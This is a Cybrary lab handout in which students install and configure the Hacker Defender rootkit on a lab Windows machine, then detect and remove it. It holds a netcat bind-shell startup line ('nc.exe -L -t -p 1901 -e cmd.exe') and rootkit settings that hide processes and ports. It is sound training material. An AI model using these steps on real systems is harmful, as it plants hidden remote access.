# CYBRARY

#### Malware Threats

#### RootKit Lab

**Description:** In this lab, students will learn how to analyze for a Rootkit infection.

**<u>Requirement:</u>** Students will need access to the Cybrary lab environment for this lab.

**<u>Step 1</u>**: Log into your Cybrary account

Step 2: Search for the RootKit lab from CybrScore

**Step 3:** Select the **Launch** button

Step 4: Click the Launch Item button

**<u>Step 5:</u>** Once the lab launches, you will see the Windows desktop screen.

Note: This lab uses an older Rootkit and an older tool (Rootkit Revealer) to help you understand the fundamentals.

**<u>Step 6:</u>** Double-click on the **Rootkit Revealer** shortcut icon on the Desktop.

**<u>Step 7:</u>** Agree to any license terms and select the **Scan** button.

Brought to you by:

**CYBRARY** | FOR BUSINESS

**<u>Step 8:</u>** You should see two false-positive alerts for Registry keys. This is a known issue.

Step 9: Close Rootkit Revealer

**<u>Step 10</u>**: Next, select the Start menu, select Run, enter cmd, and click the Ok button tolaunch the command prompt.

Step 11: Next, type in tasklist and press Enter

**<u>Step 12</u>**: Check for open ports by typing the following command and pressing Enter.

netstat -an

**<u>Step 13</u>**: For this lab, we're going to be using **port 1901** (not pictured in the lab), so just make a notation of this number for later in the lab.

**<u>Step 14</u>**: Next, you're going to change the directory.

**<u>Step 15:</u>** Type the following at the prompt and press Enter.

cd C:\Documents and Settings\admin\Desktop\hxdef084 files\

**<u>Step 16</u>**: Next, you're going to rename two files from the command prompt.

Brought to you by:

**CYBRARY** | FOR BUSINESS

**Step 17:** Type the following and press Enter

rename hxdef084.exe a1g.exe

Step 18: Type the following and press Enter rename hxdef084.2.ini a1g.ini

**Step 19:** Next, you'll open the initialization file you just renamed by typing the following and pressing Enter.

notepad a1g.ini

**Step 20:** Next, you will make changes to the .ini file

**<u>Step 21:</u>** Under the [Hidden Table] section, change it to **a1g** 

**Step 22:** Under the [Root Processes] section, change them to the following:

A1g.exe

cmd.exe

**Step 23:** Under the [Startup Run] section, add in the following:

C:\Documents and Settings\admin\Desktop\nc.exe? -L -t -p 1901 -e

C:\Windows\system32\cmd.exe

Brought to you by:

**CYBRARY** | FOR BUSINESS

Step 24: Under the [Hidden Ports] section, add in the port from earlier: 1901
Step 25: Under the [Settings] section, change the Password= to Password=1337
Step 26: Under the [Settings] section, change the DriverName to = alg.exe
Step 27: Under the [Settings] section, change the DriverFileName to = alg.sys

**<u>Step 28</u>**: Next, you'll refresh the modified executable by entering this command at the prompt: **a1g.exe -:refresh** 

**Step 29:** Run the Rootkit by enter this command and pressing Enter: **a1g.exe** 

Step 30: Enter tasklist and press Enter to verify the alg.exe process is running

**Step 31:** Next, let's see if the Rootkit is listening on port 1901 as we specified earlier.

Step 32: Enter this command at the prompt and press Enter: netstat -ano

Question 1: Do you see port 1901 listening?

Brought to you by:

**CYBRARY** | FOR BUSINESS

**<u>Step 33:</u>** Double-click on the Rootkit Revealer shortcut icon

**<u>Step 34</u>**: Select the **Options** menu and ensure both options are checked

Step 35: Select the Scan button

Question 2: What do the scan results now show? \_

**<u>Step 36</u>**: Switch to the Kali Linux machine by selecting the Resources tab in the lab window

**<u>Step 37</u>**: Log into the Kali machine by entering a username of **root** and a password of **toor** 

**<u>Step 38</u>**: Open a Terminal window by selecting the black-colored box on the left-side of the desktop.

**<u>Step 39</u>**: Next, you'll connect to the Windows (target) machine, where the Rootkit is installed by using netcat.

**Step 40:** Enter the following command at the prompt and press Enter

netcat 10.0.10.20 1901

Step 41: Enter in hostname at the prompt and press Enter

Brought to you by:

**CYBRARY** | FOR BUSINESS

## CYBRARY

Question 3: What is the hostname? \_\_\_\_\_

**Step 42:** Next, go back to the Resources tab in the lab and select the Windows machine.

Step 43: Enter tasklist at the command prompt and press Enter

**<u>Step 44:</u>** Locate these suspicious processes: **nc.exe** and **a1g.exe** 

**Step 45:** Make a note of the process ID (PID) numbers for the processes.

**Step 46:** Next, enter the following command at the prompt and substitute the PID# for the process ID you found for both nc.exe and a1g.exe

#### taskkill /F /pid PID#

Step 47: Enter tasklist and press Enter

Question 4: Are the processes still running?

Brought to you by:

**CYBRARY** | FOR BUSINESS